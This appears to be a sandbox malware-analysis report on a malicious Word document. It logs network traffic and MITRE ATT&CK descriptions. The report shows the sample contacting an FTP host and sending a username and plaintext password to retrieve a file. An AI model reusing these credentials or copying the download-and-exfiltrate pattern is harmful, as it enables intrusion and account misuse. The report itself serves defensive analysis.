Sep 20, 2022 12:02:10.837728024 CEST	21	49179	185.27.134.11	192.168.2.22
Sep 20, 2022 12:02:10.837802887 CEST	49179	21	192.168.2.22	185.27.134.11
Sep 20, 2022 12:02:10.838289976 CEST	49179	21	192.168.2.22	185.27.134.11
Sep 20, 2022 12:02:10.910141945 CEST	21	49179	185.27.134.11	192.168.2.22
Sep 20, 2022 12:02:10.910326004 CEST	49179	21	192.168.2.22	185.27.134.11
Sep 20, 2022 12:02:10.936786890 CEST	49180	21	192.168.2.22	185.27.134.11
Sep 20, 2022 12:02:10.984545946 CEST	21	49180	185.27.134.11	192.168.2.22
Sep 20, 2022 12:02:10.984663010 CEST	49180	21	192.168.2.22	185.27.134.11
Sep 20, 2022 12:02:11.032004118 CEST	21	49180	185.27.134.11	192.168.2.22
Sep 20, 2022 12:02:11.032083035 CEST	49180	21	192.168.2.22	185.27.134.11
Sep 20, 2022 12:02:11.033051968 CEST	49180	21	192.168.2.22	185.27.134.11
Sep 20, 2022 12:02:11.080388069 CEST	21	49180	185.27.134.11	192.168.2.22
Sep 20, 2022 12:02:11.080477953 CEST	21	49180	185.27.134.11	192.168.2.22
Sep 20, 2022 12:02:11.080568075 CEST	49180	21	192.168.2.22	185.27.134.11
Sep 20, 2022 12:02:11.080775023 CEST	49180	21	192.168.2.22	185.27.134.11
Sep 20, 2022 12:02:11.150372982 CEST	21	49180	185.27.134.11	192.168.2.22
Sep 20, 2022 12:02:11.150564909 CEST	49180	21	192.168.2.22	185.27.134.11
Sep 20, 2022 12:02:11.151166916 CEST	49180	21	192.168.2.22	185.27.134.11
Sep 20, 2022 12:02:11.200845003 CEST	21	49180	185.27.134.11	192.168.2.22
Sep 20, 2022 12:02:11.201036930 CEST	49180	21	192.168.2.22	185.27.134.11
Sep 20, 2022 12:02:11.202518940 CEST	49180	21	192.168.2.22	185.27.134.11
Sep 20, 2022 12:02:11.248918056 CEST	21	49180	185.27.134.11	192.168.2.22
Sep 20, 2022 12:02:11.249136925 CEST	49180	21	192.168.2.22	185.27.134.11
Sep 20, 2022 12:02:11.249938011 CEST	49181	18657	192.168.2.22	185.27.134.11
Sep 20, 2022 12:02:11.295718908 CEST	18657	49181	185.27.134.11	192.168.2.22
Sep 20, 2022 12:02:11.295818090 CEST	49181	18657	192.168.2.22	185.27.134.11
Sep 20, 2022 12:02:11.296056032 CEST	49180	21	192.168.2.22	185.27.134.11
Sep 20, 2022 12:02:11.341979027 CEST	21	49180	185.27.134.11	192.168.2.22
Sep 20, 2022 12:02:11.342092037 CEST	49180	21	192.168.2.22	185.27.134.11
Sep 20, 2022 12:02:11.342463970 CEST	49180	21	192.168.2.22	185.27.134.11
Sep 20, 2022 12:02:11.388988972 CEST	21	49180	185.27.134.11	192.168.2.22
Sep 20, 2022 12:02:11.389071941 CEST	18657	49181	185.27.134.11	192.168.2.22
Sep 20, 2022 12:02:11.389091969 CEST	49180	21	192.168.2.22	185.27.134.11
Sep 20, 2022 12:02:11.389117002 CEST	18657	49181	185.27.134.11	192.168.2.22
Sep 20, 2022 12:02:11.389137983 CEST	49181	18657	192.168.2.22	185.27.134.11
Sep 20, 2022 12:02:11.389185905 CEST	18657	49181	185.27.134.11	192.168.2.22
Sep 20, 2022 12:02:11.389205933 CEST	49181	18657	192.168.2.22	185.27.134.11
Sep 20, 2022 12:02:11.389231920 CEST	49181	18657	192.168.2.22	185.27.134.11
Sep 20, 2022 12:02:11.389252901 CEST	21	49180	185.27.134.11	192.168.2.22
Sep 20, 2022 12:02:11.389292955 CEST	18657	49181	185.27.134.11	192.168.2.22
Sep 20, 2022 12:02:11.389305115 CEST	49180	21	192.168.2.22	185.27.134.11
Sep 20, 2022 12:02:11.389333010 CEST	18657	49181	185.27.134.11	192.168.2.22
Sep 20, 2022 12:02:11.389352083 CEST	49181	18657	192.168.2.22	185.27.134.11
Sep 20, 2022 12:02:11.389389038 CEST	18657	49181	185.27.134.11	192.168.2.22
Sep 20, 2022 12:02:11.389400005 CEST	49181	18657	192.168.2.22	185.27.134.11
Sep 20, 2022 12:02:11.389429092 CEST	18657	49181	185.27.134.11	192.168.2.22
Sep 20, 2022 12:02:11.389446020 CEST	49181	18657	192.168.2.22	185.27.134.11
Sep 20, 2022 12:02:11.389486074 CEST	49181	18657	192.168.2.22	185.27.134.11
Sep 20, 2022 12:02:15.444097996 CEST	49179	21	192.168.2.22	185.27.134.11
Sep 20, 2022 12:02:15.490041018 CEST	21	49179	185.27.134.11	192.168.2.22
Sep 20, 2022 12:02:15.490206003 CEST	49179	21	192.168.2.22	185.27.134.11
Sep 20, 2022 12:02:15.490854979 CEST	49179	21	192.168.2.22	185.27.134.11
Sep 20, 2022 12:02:15.536734104 CEST	21	49179	185.27.134.11	192.168.2.22
Sep 20, 2022 12:02:15.536968946 CEST	49179	21	192.168.2.22	185.27.134.11
Sep 20, 2022 12:02:15.540354013 CEST	49179	21	192.168.2.22	185.27.134.11
Sep 20, 2022 12:02:15.586121082 CEST	21	49179	185.27.134.11	192.168.2.22
Sep 20, 2022 12:02:15.586226940 CEST	49179	21	192.168.2.22	185.27.134.11
Sep 20, 2022 12:02:15.587541103 CEST	49179	21	192.168.2.22	185.27.134.11
Sep 20, 2022 12:02:15.633366108 CEST	21	49179	185.27.134.11	192.168.2.22
Sep 20, 2022 12:02:15.633512020 CEST	49179	21	192.168.2.22	185.27.134.11
Sep 20, 2022 12:02:15.635066986 CEST	49179	21	192.168.2.22	185.27.134.11
Sep 20, 2022 12:02:15.680747032 CEST	21	49179	185.27.134.11	192.168.2.22
Sep 20, 2022 12:02:15.680932999 CEST	49179	21	192.168.2.22	185.27.134.11
Sep 20, 2022 12:02:15.681423903 CEST	49179	21	192.168.2.22	185.27.134.11
Sep 20, 2022 12:02:15.728256941 CEST	21	49179	185.27.134.11	192.168.2.22
Sep 20, 2022 12:02:15.728455067 CEST	49179	21	192.168.2.22	185.27.134.11
Sep 20, 2022 12:02:15.729652882 CEST	49181	18657	192.168.2.22	185.27.134.11
Sep 20, 2022 12:02:15.733166933 CEST	49183	21	192.168.2.22	185.27.134.11
Sep 20, 2022 12:02:15.775399923 CEST	18657	49181	185.27.134.11	192.168.2.22
Sep 20, 2022 12:02:15.778943062 CEST	21	49183	185.27.134.11	192.168.2.22
Sep 20, 2022 12:02:15.779099941 CEST	49183	21	192.168.2.22	185.27.134.11
Sep 20, 2022 12:02:15.826597929 CEST	21	49183	185.27.134.11	192.168.2.22
Sep 20, 2022 12:02:15.826807976 CEST	49183	21	192.168.2.22	185.27.134.11
Sep 20, 2022 12:02:15.827395916 CEST	49183	21	192.168.2.22	185.27.134.11
Sep 20, 2022 12:02:15.873198032 CEST	21	49183	185.27.134.11	192.168.2.22
Sep 20, 2022 12:02:15.873446941 CEST	21	49183	185.27.134.11	192.168.2.22
Sep 20, 2022 12:02:15.873541117 CEST	49183	21	192.168.2.22	185.27.134.11
Sep 20, 2022 12:02:15.873877048 CEST	49183	21	192.168.2.22	185.27.134.11
Sep 20, 2022 12:02:15.959799051 CEST	21	49183	185.27.134.11	192.168.2.22
Sep 20, 2022 12:02:18.971479893 CEST	21	49183	185.27.134.11	192.168.2.22
Sep 20, 2022 12:02:18.971641064 CEST	49183	21	192.168.2.22	185.27.134.11
Sep 20, 2022 12:02:18.971755028 CEST	49183	21	192.168.2.22	185.27.134.11
Sep 20, 2022 12:02:19.017976046 CEST	21	49183	185.27.134.11	192.168.2.22
Sep 20, 2022 12:02:19.018204927 CEST	49183	21	192.168.2.22	185.27.134.11
Sep 20, 2022 12:02:19.022921085 CEST	21	49183	185.27.134.11	192.168.2.22
Sep 20, 2022 12:02:19.023060083 CEST	49183	21	192.168.2.22	185.27.134.11
Sep 20, 2022 12:02:19.616050959 CEST	49180	21	192.168.2.22	185.27.134.11
Sep 20, 2022 12:02:19.662720919 CEST	21	49180	185.27.134.11	192.168.2.22
Sep 20, 2022 12:02:19.662802935 CEST	49180	21	192.168.2.22	185.27.134.11
Sep 20, 2022 12:02:19.670332909 CEST	49180	21	192.168.2.22	185.27.134.11
Sep 20, 2022 12:02:19.716695070 CEST	21	49180	185.27.134.11	192.168.2.22
Sep 20, 2022 12:02:19.716806889 CEST	49180	21	192.168.2.22	185.27.134.11
Sep 20, 2022 12:02:19.717375040 CEST	49184	30008	192.168.2.22	185.27.134.11
Sep 20, 2022 12:02:19.763015985 CEST	30008	49184	185.27.134.11	192.168.2.22
Sep 20, 2022 12:02:19.763107061 CEST	49184	30008	192.168.2.22	185.27.134.11
Sep 20, 2022 12:02:19.763428926 CEST	49180	21	192.168.2.22	185.27.134.11
Sep 20, 2022 12:02:19.813055992 CEST	21	49180	185.27.134.11	192.168.2.22
Sep 20, 2022 12:02:19.813225985 CEST	49180	21	192.168.2.22	185.27.134.11
Sep 20, 2022 12:02:19.872776985 CEST	49180	21	192.168.2.22	185.27.134.11
Sep 20, 2022 12:02:19.948721886 CEST	21	49180	185.27.134.11	192.168.2.22
Sep 20, 2022 12:02:19.948775053 CEST	30008	49184	185.27.134.11	192.168.2.22
Sep 20, 2022 12:02:19.948802948 CEST	30008	49184	185.27.134.11	192.168.2.22
Sep 20, 2022 12:02:19.948812008 CEST	49180	21	192.168.2.22	185.27.134.11
Sep 20, 2022 12:02:19.948832989 CEST	30008	49184	185.27.134.11	192.168.2.22
Sep 20, 2022 12:02:19.948832989 CEST	49184	30008	192.168.2.22	185.27.134.11
Sep 20, 2022 12:02:19.948863983 CEST	30008	49184	185.27.134.11	192.168.2.22
Sep 20, 2022 12:02:19.948867083 CEST	49184	30008	192.168.2.22	185.27.134.11
Sep 20, 2022 12:02:19.948885918 CEST	30008	49184	185.27.134.11	192.168.2.22
Sep 20, 2022 12:02:19.948906898 CEST	30008	49184	185.27.134.11	192.168.2.22
Sep 20, 2022 12:02:19.948919058 CEST	30008	49184	185.27.134.11	192.168.2.22
Sep 20, 2022 12:02:19.948923111 CEST	49184	30008	192.168.2.22	185.27.134.11
Sep 20, 2022 12:02:19.948932886 CEST	21	49180	185.27.134.11	192.168.2.22
Sep 20, 2022 12:02:19.948960066 CEST	49184	30008	192.168.2.22	185.27.134.11
Sep 20, 2022 12:02:19.948973894 CEST	49180	21	192.168.2.22	185.27.134.11
Sep 20, 2022 12:02:20.380220890 CEST	49179	21	192.168.2.22	185.27.134.11
Sep 20, 2022 12:02:20.426716089 CEST	21	49179	185.27.134.11	192.168.2.22
Sep 20, 2022 12:02:20.426924944 CEST	49179	21	192.168.2.22	185.27.134.11
Sep 20, 2022 12:02:20.427117109 CEST	49179	21	192.168.2.22	185.27.134.11
Sep 20, 2022 12:02:20.474080086 CEST	21	49179	185.27.134.11	192.168.2.22
Sep 20, 2022 12:02:20.474724054 CEST	49179	21	192.168.2.22	185.27.134.11
Sep 20, 2022 12:02:20.474771023 CEST	49179	21	192.168.2.22	185.27.134.11
Sep 20, 2022 12:02:20.521704912 CEST	21	49179	185.27.134.11	192.168.2.22
Sep 20, 2022 12:02:20.521862030 CEST	49179	21	192.168.2.22	185.27.134.11
Sep 20, 2022 12:02:20.522870064 CEST	49179	21	192.168.2.22	185.27.134.11
Sep 20, 2022 12:02:20.570864916 CEST	21	49179	185.27.134.11	192.168.2.22
Sep 20, 2022 12:02:20.571019888 CEST	49179	21	192.168.2.22	185.27.134.11
Sep 20, 2022 12:02:20.580239058 CEST	49179	21	192.168.2.22	185.27.134.11
Sep 20, 2022 12:02:20.628501892 CEST	21	49179	185.27.134.11	192.168.2.22
Sep 20, 2022 12:02:20.628606081 CEST	49179	21	192.168.2.22	185.27.134.11
Sep 20, 2022 12:02:20.628993034 CEST	49179	21	192.168.2.22	185.27.134.11
Sep 20, 2022 12:02:20.676326990 CEST	21	49179	185.27.134.11	192.168.2.22
Sep 20, 2022 12:02:20.676578999 CEST	49179	21	192.168.2.22	185.27.134.11
Sep 20, 2022 12:02:20.678829908 CEST	49184	30008	192.168.2.22	185.27.134.11
Sep 20, 2022 12:02:20.681394100 CEST	49186	21	192.168.2.22	185.27.134.11
Sep 20, 2022 12:02:20.724914074 CEST	30008	49184	185.27.134.11	192.168.2.22
Sep 20, 2022 12:02:20.728101015 CEST	21	49186	185.27.134.11	192.168.2.22
Sep 20, 2022 12:02:20.728266954 CEST	49186	21	192.168.2.22	185.27.134.11
Sep 20, 2022 12:02:20.777198076 CEST	21	49186	185.27.134.11	192.168.2.22
Sep 20, 2022 12:02:20.777391911 CEST	49186	21	192.168.2.22	185.27.134.11
Sep 20, 2022 12:02:20.777734041 CEST	49186	21	192.168.2.22	185.27.134.11
Sep 20, 2022 12:02:20.823724031 CEST	21	49186	185.27.134.11	192.168.2.22
Sep 20, 2022 12:02:20.823898077 CEST	21	49186	185.27.134.11	192.168.2.22
Sep 20, 2022 12:02:20.824001074 CEST	49186	21	192.168.2.22	185.27.134.11
Sep 20, 2022 12:02:20.824271917 CEST	49186	21	192.168.2.22	185.27.134.11
Sep 20, 2022 12:02:20.910762072 CEST	21	49186	185.27.134.11	192.168.2.22
Sep 20, 2022 12:02:26.714620113 CEST	21	49186	185.27.134.11	192.168.2.22
Sep 20, 2022 12:02:26.714818954 CEST	49186	21	192.168.2.22	185.27.134.11
Sep 20, 2022 12:02:26.714895010 CEST	49186	21	192.168.2.22	185.27.134.11
Sep 20, 2022 12:02:26.762840033 CEST	21	49186	185.27.134.11	192.168.2.22
Sep 20, 2022 12:02:26.762882948 CEST	21	49186	185.27.134.11	192.168.2.22
Sep 20, 2022 12:02:26.762926102 CEST	49186	21	192.168.2.22	185.27.134.11
Sep 20, 2022 12:02:26.762974977 CEST	49186	21	192.168.2.22	185.27.134.11
Sep 20, 2022 12:03:20.018928051 CEST	21	49180	185.27.134.11	192.168.2.22
Sep 20, 2022 12:03:20.019193888 CEST	49180	21	192.168.2.22	185.27.134.11
Sep 20, 2022 12:03:20.019964933 CEST	21	49180	185.27.134.11	192.168.2.22
Sep 20, 2022 12:03:20.020062923 CEST	49180	21	192.168.2.22	185.27.134.11
Sep 20, 2022 12:03:20.775015116 CEST	21	49179	185.27.134.11	192.168.2.22
Sep 20, 2022 12:03:20.775221109 CEST	49179	21	192.168.2.22	185.27.134.11
Sep 20, 2022 12:03:20.775736094 CEST	21	49179	185.27.134.11	192.168.2.22
Sep 20, 2022 12:03:20.775816917 CEST	49179	21	192.168.2.22	185.27.134.11

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 20, 2022 12:02:10.660922050 CEST	59915	53	192.168.2.22	8.8.8.8
Sep 20, 2022 12:02:10.681641102 CEST	53	59915	8.8.8.8	192.168.2.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Sep 20, 2022 12:02:10.660922050 CEST	192.168.2.22	8.8.8.8	0xfc65	Standard query (0)	ftpupload.net	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Sep 20, 2022 12:02:10.681641102 CEST	8.8.8.8	192.168.2.22	0xfc65	No error (0)	ftpupload.net		185.27.134.11	A (IP address)	IN (0x0001)	false

FTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Sep 20, 2022 12:02:10.791011095 CEST	21	49179	185.27.134.11	192.168.2.22	220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 380 of 6900 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 380 of 6900 allowed.220-Local time is now 05:31. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 380 of 6900 allowed.220-Local time is now 05:31. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 380 of 6900 allowed.220-Local time is now 05:31. Server port: 21.220-This is a private system - No anonymous login220 You will be disconnected after 60 seconds of inactivity.
Sep 20, 2022 12:02:10.792032003 CEST	49179	21	192.168.2.22	185.27.134.11	USER epiz_32594997
Sep 20, 2022 12:02:10.837728024 CEST	21	49179	185.27.134.11	192.168.2.22	331 User epiz_32594997 OK. Password required
Sep 20, 2022 12:02:10.838289976 CEST	49179	21	192.168.2.22	185.27.134.11	PASS FKmeEtIWDg
Sep 20, 2022 12:02:10.910141945 CEST	21	49179	185.27.134.11	192.168.2.22	230-Your bandwidth usage is restricted 230-Your bandwidth usage is restricted230 OK. Current restricted directory is /
Sep 20, 2022 12:02:11.032004118 CEST	21	49180	185.27.134.11	192.168.2.22	220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 379 of 6900 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 379 of 6900 allowed.220-Local time is now 05:31. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 379 of 6900 allowed.220-Local time is now 05:31. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 379 of 6900 allowed.220-Local time is now 05:31. Server port: 21.220-This is a private system - No anonymous login220 You will be disconnected after 60 seconds of inactivity.
Sep 20, 2022 12:02:11.033051968 CEST	49180	21	192.168.2.22	185.27.134.11	USER epiz_32594997
Sep 20, 2022 12:02:11.080477953 CEST	21	49180	185.27.134.11	192.168.2.22	331 User epiz_32594997 OK. Password required
Sep 20, 2022 12:02:11.080775023 CEST	49180	21	192.168.2.22	185.27.134.11	PASS FKmeEtIWDg
Sep 20, 2022 12:02:11.150372982 CEST	21	49180	185.27.134.11	192.168.2.22	230-Your bandwidth usage is restricted 230-Your bandwidth usage is restricted230 OK. Current restricted directory is /
Sep 20, 2022 12:02:11.151166916 CEST	49180	21	192.168.2.22	185.27.134.11	TYPE I
Sep 20, 2022 12:02:11.200845003 CEST	21	49180	185.27.134.11	192.168.2.22	200 TYPE is now 8-bit binary
Sep 20, 2022 12:02:11.202518940 CEST	49180	21	192.168.2.22	185.27.134.11	PASV
Sep 20, 2022 12:02:11.248918056 CEST	21	49180	185.27.134.11	192.168.2.22	227 Entering Passive Mode (185,27,134,11,72,225)
Sep 20, 2022 12:02:11.341979027 CEST	21	49180	185.27.134.11	192.168.2.22	213 6827
Sep 20, 2022 12:02:11.342463970 CEST	49180	21	192.168.2.22	185.27.134.11	RETR /htdocs/a.html
Sep 20, 2022 12:02:11.388988972 CEST	21	49180	185.27.134.11	192.168.2.22	150-Accepted data connection 150-Accepted data connection150 6.7 kbytes to download
Sep 20, 2022 12:02:11.389252901 CEST	21	49180	185.27.134.11	192.168.2.22	226-File successfully transferred 226-File successfully transferred226 0.000 seconds (measured here), 52.92 Mbytes per second
Sep 20, 2022 12:02:15.444097996 CEST	49179	21	192.168.2.22	185.27.134.11	CWD /htdocs/
Sep 20, 2022 12:02:15.490041018 CEST	21	49179	185.27.134.11	192.168.2.22	250 OK. Current directory is /htdocs
Sep 20, 2022 12:02:15.490854979 CEST	49179	21	192.168.2.22	185.27.134.11	PWD
Sep 20, 2022 12:02:15.536734104 CEST	21	49179	185.27.134.11	192.168.2.22	257 "/htdocs" is your current location
Sep 20, 2022 12:02:15.540354013 CEST	49179	21	192.168.2.22	185.27.134.11	TYPE A
Sep 20, 2022 12:02:15.586121082 CEST	21	49179	185.27.134.11	192.168.2.22	200 TYPE is now ASCII
Sep 20, 2022 12:02:15.587541103 CEST	49179	21	192.168.2.22	185.27.134.11	PORT 192,168,2,22,192,30
Sep 20, 2022 12:02:15.633366108 CEST	21	49179	185.27.134.11	192.168.2.22	500 I won't open a connection to 192.168.2.22 (only to 84.17.52.43)
Sep 20, 2022 12:02:15.680747032 CEST	21	49179	185.27.134.11	192.168.2.22	500 Unknown command
Sep 20, 2022 12:02:15.681423903 CEST	49179	21	192.168.2.22	185.27.134.11	CWD /htdocs/
Sep 20, 2022 12:02:15.728256941 CEST	21	49179	185.27.134.11	192.168.2.22	250 OK. Current directory is /htdocs
Sep 20, 2022 12:02:15.826597929 CEST	21	49183	185.27.134.11	192.168.2.22	220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 376 of 6900 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 376 of 6900 allowed.220-Local time is now 05:31. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 376 of 6900 allowed.220-Local time is now 05:31. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 376 of 6900 allowed.220-Local time is now 05:31. Server port: 21.220-This is a private system - No anonymous login220 You will be disconnected after 60 seconds of inactivity.
Sep 20, 2022 12:02:15.827395916 CEST	49183	21	192.168.2.22	185.27.134.11	USER anonymous
Sep 20, 2022 12:02:15.873446941 CEST	21	49183	185.27.134.11	192.168.2.22	331 User anonymous OK. Password required
Sep 20, 2022 12:02:15.873877048 CEST	49183	21	192.168.2.22	185.27.134.11	PASS User@
Sep 20, 2022 12:02:18.971479893 CEST	21	49183	185.27.134.11	192.168.2.22	530 Login authentication failed
Sep 20, 2022 12:02:19.017976046 CEST	21	49183	185.27.134.11	192.168.2.22	530 Logout.
Sep 20, 2022 12:02:19.616050959 CEST	49180	21	192.168.2.22	185.27.134.11	TYPE I
Sep 20, 2022 12:02:19.662720919 CEST	21	49180	185.27.134.11	192.168.2.22	200 TYPE is now 8-bit binary
Sep 20, 2022 12:02:19.670332909 CEST	49180	21	192.168.2.22	185.27.134.11	PASV
Sep 20, 2022 12:02:19.716695070 CEST	21	49180	185.27.134.11	192.168.2.22	227 Entering Passive Mode (185,27,134,11,117,56)
Sep 20, 2022 12:02:19.813055992 CEST	21	49180	185.27.134.11	192.168.2.22	213 6827
Sep 20, 2022 12:02:19.872776985 CEST	49180	21	192.168.2.22	185.27.134.11	RETR /htdocs/a.html
Sep 20, 2022 12:02:19.948721886 CEST	21	49180	185.27.134.11	192.168.2.22	150-Accepted data connection 150-Accepted data connection150 6.7 kbytes to download
Sep 20, 2022 12:02:19.948932886 CEST	21	49180	185.27.134.11	192.168.2.22	226-File successfully transferred 226-File successfully transferred226 0.000 seconds (measured here), 48.59 Mbytes per second
Sep 20, 2022 12:02:20.380220890 CEST	49179	21	192.168.2.22	185.27.134.11	CWD /htdocs/
Sep 20, 2022 12:02:20.426716089 CEST	21	49179	185.27.134.11	192.168.2.22	250 OK. Current directory is /htdocs
Sep 20, 2022 12:02:20.427117109 CEST	49179	21	192.168.2.22	185.27.134.11	PWD
Sep 20, 2022 12:02:20.474080086 CEST	21	49179	185.27.134.11	192.168.2.22	257 "/htdocs" is your current location
Sep 20, 2022 12:02:20.474771023 CEST	49179	21	192.168.2.22	185.27.134.11	TYPE A
Sep 20, 2022 12:02:20.521704912 CEST	21	49179	185.27.134.11	192.168.2.22	200 TYPE is now ASCII
Sep 20, 2022 12:02:20.522870064 CEST	49179	21	192.168.2.22	185.27.134.11	PORT 192,168,2,22,192,33
Sep 20, 2022 12:02:20.570864916 CEST	21	49179	185.27.134.11	192.168.2.22	500 I won't open a connection to 192.168.2.22 (only to 84.17.52.43)
Sep 20, 2022 12:02:20.628501892 CEST	21	49179	185.27.134.11	192.168.2.22	500 Unknown command
Sep 20, 2022 12:02:20.628993034 CEST	49179	21	192.168.2.22	185.27.134.11	CWD /htdocs/
Sep 20, 2022 12:02:20.676326990 CEST	21	49179	185.27.134.11	192.168.2.22	250 OK. Current directory is /htdocs
Sep 20, 2022 12:02:20.777198076 CEST	21	49186	185.27.134.11	192.168.2.22	220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 345 of 6900 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 345 of 6900 allowed.220-Local time is now 05:31. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 345 of 6900 allowed.220-Local time is now 05:31. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 345 of 6900 allowed.220-Local time is now 05:31. Server port: 21.220-This is a private system - No anonymous login220 You will be disconnected after 60 seconds of inactivity.
Sep 20, 2022 12:02:20.777734041 CEST	49186	21	192.168.2.22	185.27.134.11	USER anonymous
Sep 20, 2022 12:02:20.823898077 CEST	21	49186	185.27.134.11	192.168.2.22	331 User anonymous OK. Password required
Sep 20, 2022 12:02:20.824271917 CEST	49186	21	192.168.2.22	185.27.134.11	PASS User@
Sep 20, 2022 12:02:26.714620113 CEST	21	49186	185.27.134.11	192.168.2.22	530 Login authentication failed
Sep 20, 2022 12:02:26.762840033 CEST	21	49186	185.27.134.11	192.168.2.22	530 Logout.
Sep 20, 2022 12:03:20.018928051 CEST	21	49180	185.27.134.11	192.168.2.22	421 Timeout - try typing a little faster next time
Sep 20, 2022 12:03:20.775015116 CEST	21	49179	185.27.134.11	192.168.2.22	421 Timeout - try typing a little faster next time

Target ID:	0
Start time:	12:01:17
Start date:	20/09/2022
Path:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Imagebase:	0x13fc20000
File size:	1423704 bytes
MD5 hash:	9EE74859D22DAE61F1750B3A1BACB6F5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Disassembly

⊘No disassembly

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may steal data by exfiltrating it over a different protocol than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.
Tactics:	Exfiltration
Data Sources:	Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report v4nkfHg4d9.doc

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Initial Sample

